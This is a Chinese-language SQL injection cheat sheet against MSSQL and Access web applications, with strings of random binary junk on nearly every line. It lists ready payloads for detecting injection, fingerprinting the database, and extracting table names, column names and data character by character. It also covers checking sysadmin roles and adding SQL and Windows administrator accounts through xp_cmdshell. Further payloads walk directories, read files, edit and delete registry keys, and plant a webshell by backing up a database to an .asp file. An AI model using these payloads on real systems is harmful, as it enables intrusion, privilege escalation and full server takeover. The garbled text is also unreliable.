1.判断是否有注入;and 1=1 ;and 1=2 hC]c
=$�=7
2.初步判断是否是mssql ;and user>0 �T]��EXm/�
&�tD`�~���
3.注入参数是字符'and [查询条件] and ''=' Sl�ZL%�C;�
9;��Wz��;p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �l4F4o6:]n
|gxU;"2`5~
5.判断数据库系统 ~<v.WP�<�:
��)gR14a��
;and (select count(*) from sysobjects)>0 mssql �/~7H<�^�}
o^&�;
`XOd
;and (select count(*) from msysobjects)>0 access �>o 3X���)
�tb/u@}"�)
v.�6"�<nT2
4>Uo0NfL��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 � 2�WE����
EemKYcE@Nr
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &O0�+\A9tP
lu��(�G3T8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �&%qD Som3
�>w�
�j7Y`
9.(1)猜字段的ascii值(access) � ��TWx<)�
.[2MPj�g��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 308w��0e�P
�IH�~H6�US
(2)猜字段的ascii值(mssql) �f��ws��q:
U"��m�!f*a
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 jc�q(�=�7j
0M8�JE9 Kx
10.测试权限结构(mssql) fy_'K}i3k
Vg�
\-^$��
��p6Z]oL q
� _&(�ij(H
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �M5ZW�cD.1
oN �`t�Z;a
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �{f^30�F�w
n"FOCcTIs�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- n;Iey[7_E`
&g& &-=7)�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 4`���8.��\
TdQ^�^{SRp
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �-S��,dG|�
=r-�Wy.�a@
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [�tD*\�\IA
�er#w�e=h
;and 1=(select IS_MEMBER('db_owner'));-- @{C���p�C�
t9�1CxZQ^s
+:'Po.{"��
C>K�/C�!5?
11.添加mssql和系统的帐户 ~!&[;EM<bm
dhVwS$�O )
;exec master.dbo.sp_addlogin username;-- +'n1?�^U��
;exec master.dbo.sp_password null,username,password;-- +]
5a(/m.~
H��JcZ~5jf
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
�E,6�E-9�
/Hx0�=�I�
;exec master.dbo.xp_cmdshell 'net user username password =�oh6�;Ojt
�^_=0.:QaW
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- n�j�q-��iU
b��s`/k&'�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- i@I��%$!cB
Xj@K�t|&`k
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- f��fB]4���
):|)�/ZiC'
>{??/f�Bd-
�u?J(l�)gd
12.(1)遍历目录 )��?xt=9Lh
&qpA<�F�@7
;create table dirs(paths varchar(100), id int) C�T���P��%
R|M�:6]}
�
;insert dirs exec master.dbo.xp_dirtree 'c:\' eS.�]@�E-T
uf>w�*�[m5
;and (select top 1 paths from dirs)>0 W�
,U'hk%�
C`#N
Q*��O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z�0:BX�t�W
0=5i\*�5 p
�.�F6�#s�
�wS��^��-o
(2)遍历目录 [T�^�6K�zz
��c"$_V[m
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <|_Ey)�1
6
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Aa Ma9hvT!
�zc{C+:3$^
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $+�);!?^|:
Tc�*PD�t0C
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 `^}9= Q'�r
:�ox CF0�Y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e���o8��0L
�x���V6j6k
={Hbx>��p
KqUFf�@�W
13.mssql中的存储过程 �5��j�LDe~
�?�c���+;�
xp_regenumvalues 注册表根键, 子键 i*tj@�5MY-
Y�gl!fC
4b
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �k8�JPu"R�
:
L�>d]�Hn
xp_regread 根键,子键,键值名 H:_���`]X"
D�5�p2�2WY
;exec xp_regread ��4jW{I�GW
�3IkG*en�I
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �k?#6j�1pn
8dH|s#.4um
xp_regwrite 根键,子键, 值名, 值类型, 值 x'q�gpG}?]
\2`�U$�3Q�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 g;h&�Xkp��
d�B5DJ:$W$
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 fm*�Hk�57�
�24Fxx9�g
xp_regdeletevalue 根键,子键,值名 �34�=0.{qn
�ii�TUhO )
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Q'VS��]�n�
�c>Se�Onf�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ?1uAY.~ZZB
���xl�LS`�
�(G VGoh�&
;k8}D*?8�
14.mssql的backup创建webshell L7-�n���PH
t�/Fe"T[,V
use model -,d�Q&Q�f?
>`�:+d'Jv0
create table cmd(str image); +�*V;�
�f,
8��(�}sZ)6
insert into cmd(str) values (''); ��)�Y�F��s
�.��vO.g/o
backup database model to disk='c:\l.asp'; I�,eyL$x�
UV�K"%kW#(
"iv�qh{ �,
�f�#5JA��R
15.mssql内置函数 w�^g�h&E�
z"3��c�+?2
;and (select @@version)>0 获得Windows的版本号 F
4/Uu�"J:
B/OO$�=>�(
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 7,TWCV�ap�
}��U9�jsm�
;and (select user_name())>0 爆当前系统的连接用户 �&}O�!��l'
�.a�*�$WGb
;and (select db_name())>0 得到当前连接的数据库 ���!U_�L�7
Zi)b<tM
q�
�ydQ�S"]\g
TeJ�
`sJ�
16.简洁的webshell nY)Pxahm�7
Ao T�7s�y7
use model rLx�X^[Fp3
y6}):���|
create table cmd(str image); ak��`)��>
ItADO'M���
insert into cmd(str) values (''); O�q6n.:8g"
Tm52=+u�f$
backup database model to disk='g:\wwwtest\l.asp';
